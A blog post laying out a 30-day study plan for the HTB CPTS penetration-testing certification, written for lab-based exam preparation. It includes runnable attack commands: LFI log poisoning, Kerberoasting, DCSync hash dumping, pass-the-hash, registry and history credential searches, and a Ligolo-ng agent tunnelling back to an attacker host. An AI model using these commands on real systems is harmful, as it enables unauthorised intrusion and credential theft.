How I'm Preparing for HTB CPTS in 30 Days

// April 2026 ~15 min read #CPTS #HTB #PenTest

The HTB Certified Penetration Testing Specialist (CPTS) is one of the most respected hands-on cybersecurity certifications available today. Unlike multiple-choice exams, CPTS is a 10-day practical exam where you perform a real penetration test against a multi-machine Active Directory environment and submit a professional report. No braindumps. No shortcuts.

This is how I'm structuring my 30-day sprint to pass it.

Who is this for? Security professionals with 6+ months of hands-on CTF/lab experience who want a structured, efficient path through the CPTS content. If you're brand new to penetration testing, budget 3-6 months, not 30 days.

// Understanding the CPTS Exam

Before building a prep plan, you need to understand exactly what the exam tests:

Format: Grey-box — you receive scope document, starting network access, and low-privilege credentials
Duration: 10-day exam window (exploitation + report writing)
Environment: Multi-machine AD network with internal pivot requirements
Deliverable: Professional penetration testing report (this is the submission)
Coverage: Web application testing, Active Directory attacks, privilege escalation, pivoting, and reporting

The exam is graded on your report, not on which machines you compromised. A well-written report documenting 5 findings will beat a sloppy report listing 10 findings every time.

// The 30-Day Plan

Days	Focus	Deliverable
1-7	Fundamentals + Enumeration modules	Nmap, Footprinting, Web recon solid
8-14	Web attacks + Exploitation modules	SQLi, XSS, file inclusion, shells comfortable
15-21	Active Directory (the exam core)	BloodHound, Kerberoasting, ACL abuse, AD CS
22-26	Privilege escalation + Pivoting	Linux/Windows privesc, Ligolo-ng, chisel
27-28	Report writing practice	Write 3 full findings from labs you've done
29-30	Tool setup + weak area review	Everything installed, templates ready

// Week 1: Fundamentals and Enumeration

Most people rush through enumeration modules to get to "the fun stuff." This is the wrong approach. Every CPTS machine requires methodical enumeration — the foothold is enumeration.

Daily structure:

Morning (1 hr): Read the module theory
Afternoon (2 hrs): Complete all module exercises on HTB
Evening (1 hr): Review flashcards + document what you learned

Key focus areas this week:

Nmap two-pass method — nmap -p- first, then targeted deep scan
SMB null sessions — enum4linux-ng -A target
SNMP community strings — onesixtyone + snmpwalk
DNS zone transfers — dig axfr @nameserver domain.com
Web fuzzing with ffuf — directories, VHosts, parameters

Week 1 checkpoint: Can you enumerate a fresh HTB machine and find all open services, usernames, and shares within 30 minutes? If not, spend more time here.

// Week 2: Web Application Attacks

CPTS has significant web app coverage. The web modules prepare you for finding and exploiting SQL injection, file inclusion, XSS, command injection, and file upload vulnerabilities in real applications — not just toy examples.

Priority modules:

SQL Injection Fundamentals (understand UNION, error-based, blind)
File Inclusion (LFI → RCE via log poisoning, PHP wrappers)
File Upload Attacks (bypass MIME, extension, and content checks)
Command Injection (bypass filters, use various separators)
Web Attacks (IDOR, XXE, SSRF — these appear in the exam)

# LFI to RCE via log poisoning
curl -s http://target/page.php?file=/var/log/apache2/access.log
# First: poison the log with PHP code in User-Agent
curl -A '' http://target/
# Then: execute commands via LFI
curl 'http://target/page.php?file=/var/log/apache2/access.log&cmd=id'

// Week 3: Active Directory (The Exam Core)

This is where the exam is won or lost. The CPTS environment is an Active Directory network. If you don't know AD attacks cold, you will run out of time.

Non-negotiable AD skills:

BloodHound — collect all data, find shortest path to Domain Admins, identify Kerberoastable accounts and DCSync rights
Kerberoasting — GetUserSPNs.py domain/user:pass -dc-ip DC -request → hashcat -m 13100
AS-REP Roasting — GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC → hashcat -m 18200
DCSync — secretsdump.py domain/admin:pass@DC — dumps all domain hashes
Pass-the-Hash — nxc smb target -u admin -H [NTLM hash]
ACL Abuse — ForceChangePassword, GenericWrite for targeted Kerberoasting
AD CS ESC1 — certipy find, enroll in vulnerable template, PKINIT to get TGT

# Complete Kerberoasting chain
impacket-GetUserSPNs corp.local/svc_user:Password1 -dc-ip 10.10.10.5 -request -outputfile spns.txt
hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt --force

# DCSync (requires DS-Replication-Get-Changes rights)
impacket-secretsdump corp.local/admin:Password1@10.10.10.5 -just-dc-ntlm

// Week 4: Privilege Escalation and Pivoting

Linux PrivEsc checklist (memorize this order):

sudo -l                           # Sudo rights — fastest path
find / -perm -4000 2>/dev/null    # SUID binaries
getcap -r / 2>/dev/null           # Capabilities
cat /etc/crontab; ls /etc/cron.d  # Cron jobs
env                               # Environment variables
cat ~/.bash_history               # Command history
./linpeas.sh | tee linpeas.txt    # Automated scan

Windows PrivEsc checklist:

whoami /priv                          # SeImpersonatePrivilege → PrintSpoofer
.\winPEAS.exe > peas.txt              # Automated scan
reg query HKLM /f password /t REG_SZ /s  # Registry creds
cmdkey /list                          # Stored credentials
sc qc VulnerableService               # Weak service permissions

Pivoting with Ligolo-ng:

# Attacker: start proxy
./proxy -selfcert -laddr 0.0.0.0:11601

# Compromised host: connect agent
./agent -connect ATTACKER:11601 -ignore-cert

# In Ligolo console:
session         # select session
start           # start tunnel

# On attacker: add route to internal subnet
ip route add 172.16.5.0/24 dev ligolo
# Now scan internal subnet directly — no proxychains needed

// Days 27-28: Report Writing Practice

Don't write your first real finding during the exam. Practice writing 3 complete findings from machines you've already compromised:

Pick a CVE you exploited on an HTB machine
Write: title, CVSS 3.1 score with vector string, affected host, numbered PoC steps with screenshots, business impact, remediation steps
Time yourself — aim for under 15 minutes per finding

Set up SysReptor now: install it, configure your finding templates, and export a test PDF to verify your setup works.

// Days 29-30: Pre-Exam Checklist

All tools installed and verified working (certipy --version, nxc --version, etc.)
CherryTree/Obsidian note template ready with sections for each host
SysReptor running with blank report template
VPN connected to HTB, tun0 verified
Wordlist directory organized: rockyou, SecLists subdomains, SecLists web-content
GitHub cheatsheet/personal notes bookmarked
Full night's sleep before exam start

// Key Resources

HTB CPTS Path — complete 100% of all modules including exercises
HackTricks — the most comprehensive attack reference available
GTFOBins — Linux binary exploitation for privesc
LOLBAS — Windows LOLBin reference
ired.team — outstanding AD attack reference
HTB Machines: Forest, Blackfield, Monteverde, Cascade, Sauna (all AD-focused)
This site — flashcards, exercises, and the mind map to track everything

⚡

Start Your CPTS Journey

Use this companion's 40 modules, exercises, flashcards, and mind map to structure your preparation. Everything here is built around the actual CPTS exam objectives.

Browse All Modules View Full Path

Save Your Progress